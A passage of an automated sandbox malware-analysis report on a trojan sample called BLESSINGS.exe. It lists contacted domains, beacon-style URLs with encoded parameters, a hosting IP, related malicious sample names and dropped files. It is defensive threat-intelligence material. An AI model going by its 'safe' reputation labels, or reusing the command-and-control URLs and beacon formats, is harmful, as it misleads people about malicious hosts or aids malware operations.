          http://www.registeredagentfirm.com/jqc/www.asacal.com0%Avira URL Cloudsafe
          http://www.screwtaped.com/jqc/www.11sxsx.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sterlworldshop.com0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com/jqc/0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com/jqc/www.quintred.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.quintred.com
          		91.195.241.137
          		truetrueunknown
          www.toweroflifeinc.com
          		unknown
          		unknowntrue
            		unknown
            www.hotvidzhub.download
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8Ptrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.the343radio.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.droriginals.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.novergi.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.com/designersGexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
              		high
              http://www.the343radio.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designers/?explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                		high
                http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.gabriellagullberg.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.kornteengoods.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.screwtaped.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.11sxsx.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.fontbureau.com/designers?explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                  		high
                  http://www.quintred.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tiro.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.sterlworldshop.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    		high
                    http://ns.adobe.c/gBLESSINGS.exe, 00000001.00000003.420634051.00000000014F8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.margosbest.com/jqc/www.the343radio.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.novergi.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.goodfont.co.krexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.registeredagentfirm.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hotvidzhub.download/jqc/www.internetmarkaching.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.internetmarkaching.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sajatypeworks.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://fontfabrik.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.screwtaped.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.internetmarkaching.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.novergi.com/jqc/www.hotvidzhub.downloadexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.margosbest.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.novergi.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cositasdepachecos.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cositasdepachecos.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cositasdepachecos.com/jqc/www.margosbest.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.droriginals.com/jqc/www.kornteengoods.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fonts.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      		high
                      http://www.sandoll.co.krexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.screwtaped.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.urwpp.deDPleaseexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.asacal.com/jqc/:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.zhongyicts.com.cnexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.11sxsx.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sakkal.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.asacal.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.11sxsx.com/jqc/www.sterlworldshop.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmpfalse
                        		high
                        http://www.hotvidzhub.downloadReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://www.quintred.com/jqc/www.novergi.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kornteengoods.com/jqc/www.screwtaped.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.internetmarkaching.com/jqc/www.gabriellagullberg.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.toweroflifeinc.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.hotvidzhub.downloadexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.gabriellagullberg.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sterlworldshop.com/jqc/www.registeredagentfirm.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.gabriellagullberg.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.droriginals.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sterlworldshop.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.toweroflifeinc.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.margosbest.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.toweroflifeinc.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.registeredagentfirm.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kornteengoods.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.quintred.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.cositasdepachecos.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.registeredagentfirm.com/jqc/www.asacal.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.screwtaped.com/jqc/www.11sxsx.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carterandcone.comlexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sterlworldshop.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.registeredagentfirm.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                              		high
                              http://www.toweroflifeinc.com/jqc/www.quintred.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cnexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.11sxsx.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.margosbest.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.the343radio.com/jqc/www.droriginals.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.droriginals.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.asacal.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers8explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_landeraserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.quintred.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.internetmarkaching.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.hotvidzhub.download/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kornteengoods.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.the343radio.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.asacal.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    91.195.241.137
                                    		unknownGermany
                                    		47846SEDO-ASDEtrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:339345
                                    Start date:13.01.2021
                                    Start time:21:23:17
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:BLESSINGS.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:27
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/2@3/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 13.3% (good quality ratio 11.9%)
                                    • Quality average: 72.2%
                                    • Quality standard deviation: 32%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 97
                                    • Number of non-executed functions: 154
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 168.61.161.212, 51.11.168.160, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.159, 52.155.217.156, 20.54.26.129, 23.210.248.85
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    21:24:17API Interceptor192x Sleep call for process: BLESSINGS.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    91.195.241.137cGLVytu1ps.exeGet hashmaliciousBrowse
                                    • www.classifoods.com/oean/?-Z_PiP=tlpEk5YekAb67KL2xlIEZIOmNCoa9q/Djdc+1mnIPyvO86vAXdVTuD4+MBqszqjRaeD5&DxoHn=2dmDC
                                    AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                    • www.rickettes.com/c8so/?Wx=nr13ryrphK0zlVsXiKvBnhVbi2g9KzOxyG/5i6d6/itGVNMIJOgEnWNtcgBznYTvqCjN&vB=lhr0E
                                    Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                    • www.defendertools.com/hpg3/?C0D=_DK4YF6&b8=zHX/nmfsF2jpuhEInZeCqq2GVgZZL3mtp8n3HsHw+mqNo1ANa4F80opyPi8dR1VNXBNhng6QAg==
                                    Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                    • www.riqinxin.com/h3qo/?mvHpc=93uRhCEwEUrVxxSjD+1b7A9hC/wpsrLkGIubP/xXjIPRWK+AIZW10n7E32UYS1kyVof9&sPj8=mh84WN0PyZRt
                                    zz4osC4FRa.exeGet hashmaliciousBrowse
                                    • www.tueddur.com/oean/?1ba0AP=BB3DgipVrPXVUiW5UQyK0nVxujvhMnc98thgbH7+/hDQNSDSTCs9gH0Ux4g93clBab5W&uHrt=FdiDzjvx
                                    btVnDhh5K7.exeGet hashmaliciousBrowse
                                    • www.eggsmission.com/oean/?wxl=3k/zNET3fDBgs70PCwEkAozdXz/XsTdoJbX3JEkHEqIeGwjgimGxO6vnXb2/67RN1xF5&Tj=YvFHu
                                    4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                    • www.classifoods.com/oean/?lTB=tlpEk5YekAb67KL2xlIEZIOmNCoa9q/Djdc+1mnIPyvO86vAXdVTuD4+MBqszqjRaeD5&Bvg=yL0LRZtXKrL
                                    SecuriteInfo.com.Trojan.Inject4.6535.29715.exeGet hashmaliciousBrowse
                                    • www.metanoria.com/kgw/?bn=yVFP8nI8&iN9tKjex=rooDW/IWxvqP4FsNUlFVETkjioyNarIrVVTP+1Jd9BYlAChzvHXiPw+dal/TLdMzQ7Xw
                                    SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                    • www.enavaorganics.com/qef6/?D0G=CSX4d1pD2kLRKFDlO4tCA0cLgGHmTgpjHEbnWeNZOOkUyG5Q5sUwopSNN7KMXAMbmA9R&Q2J=fjlpdDePPPndHZ
                                    rtgs_pdf.exeGet hashmaliciousBrowse
                                    • www.pupupe.com/s9zh/?mL08q=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDvHfmPWsuiRw&9rn=DhodLVupGVRTP
                                    P.O-45.exeGet hashmaliciousBrowse
                                    • www.pupupe.com/s9zh/?RHR=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDsnPpuGUwH43&3f=YnOlnZfXtJb
                                    order FTH2004-005.exeGet hashmaliciousBrowse
                                    • www.pupupe.com/s9zh/?EPq8iH=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDsnPpuGUwH43&CX6pD=7n9piL3
                                    invv.exeGet hashmaliciousBrowse
                                    • www.fwk.xyz/hko6/?2d=onela&-Z2hnx=6iCdWQChhF1B2ngEJZJ/gKGrjnSNWRrW9r5tJ02nK9H7mFxzcWn79b1voLyujwr0K/Rr
                                    ins.exeGet hashmaliciousBrowse
                                    • www.fwk.xyz/hko6/?FDHH=6iCdWQChhF1B2ngEJZJ/gKGrjnSNWRrW9r5tJ02nK9H7mFxzcWn79b1voLyujwr0K/Rr&Rb=Vtx06
                                    http://exform.com/flbookcounter/bookid.phpGet hashmaliciousBrowse
                                    • exform.com/search/tsc.php?200=MjExNzU4NDg5&21=ODQuMTcuNTIuMjU=&681=MTYwNzQ0NTA1Mzc4YjJkNzdjZGVlMDEwNTdhMGE1MTc5MjdmYjY2YTk2&crc=99325bc99b2534dbb1e8ae9053770a91bbe8417c&cv=1
                                    http://moviejoy.toGet hashmaliciousBrowse
                                    • moviejoy.to/
                                    PO11272020.xlsxGet hashmaliciousBrowse
                                    • www.gedefo.com/zsh/
                                    ptFIhqUe89.exeGet hashmaliciousBrowse
                                    • www.bostonrealestate.club/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=/yqXkG2lSpYuwVXBVRCnSHuV3ulBryT1KsOGiBOC3E9h0rTdOIqyr7GAs5aIBhUmKjlm
                                    EME.39134.xlsxGet hashmaliciousBrowse
                                    • www.oyagu.com/mfg6/?rF=_HCtZ4&yzux_nSp=cnnW0LVOybN2chQ+0+pD4+tuKDmdXLYWsjvHUhFw4C6tCTmFc0h1VdXTZsfKhcluhQRUVw==
                                    Tyre Pricelist.xlsxGet hashmaliciousBrowse
                                    • www.pestigenix.com/kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    SEDO-ASDEorden pdf.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.docGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    PO#218740.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    cGLVytu1ps.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    Consignment Details.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    Purchase Order -263.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    zz4osC4FRa.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    btVnDhh5K7.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    SecuriteInfo.com.Trojan.Inject4.6535.29715.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    Pending PURCHASE ORDER - 47001516.pdf.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    order no. 3643.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    Details!!!!.exeGet hashmaliciousBrowse
                                    • 91.195.240.94
                                    rtgs_pdf.exeGet hashmaliciousBrowse
                                    • 91.195.241.137
                                    http://walmartprepaid.comGet hashmaliciousBrowse
                                    • 91.195.240.136
                                    P.O-45.exeGet hashmaliciousBrowse
                                    • 91.195.241.137

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Local\Temp\AddInProcess32.exeQP-0766.scr.exeGet hashmaliciousBrowse
                                      order-181289654312464648.exeGet hashmaliciousBrowse
                                        PO_60577.exeGet hashmaliciousBrowse
                                          IMG_73344332#U00e2#U20ac#U00aegpj.exeGet hashmaliciousBrowse
                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                              Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Generic.mg.15368412abd71685.exeGet hashmaliciousBrowse
                                                  RT-05723.exeGet hashmaliciousBrowse
                                                    Dekont.pdf.exeGet hashmaliciousBrowse
                                                      cFAWQ1mv83.exeGet hashmaliciousBrowse
                                                        I7313Y5Rr2.exeGet hashmaliciousBrowse
                                                          SWIFT-COPY Payment advice3243343.exeGet hashmaliciousBrowse
                                                            bWVvaTptgL.exeGet hashmaliciousBrowse
                                                              umOXxQ9PFS.exeGet hashmaliciousBrowse
                                                                BL,IN&PL.exeGet hashmaliciousBrowse
                                                                  ORDER #0554.exeGet hashmaliciousBrowse
                                                                    Dekont.pdf.exeGet hashmaliciousBrowse
                                                                      IMG_84755643#U00e2#U20ac#U00aegpj.exeGet hashmaliciousBrowse
                                                                        8WLxD8uxRN.exeGet hashmaliciousBrowse
                                                                          Quotation.exeGet hashmaliciousBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.log
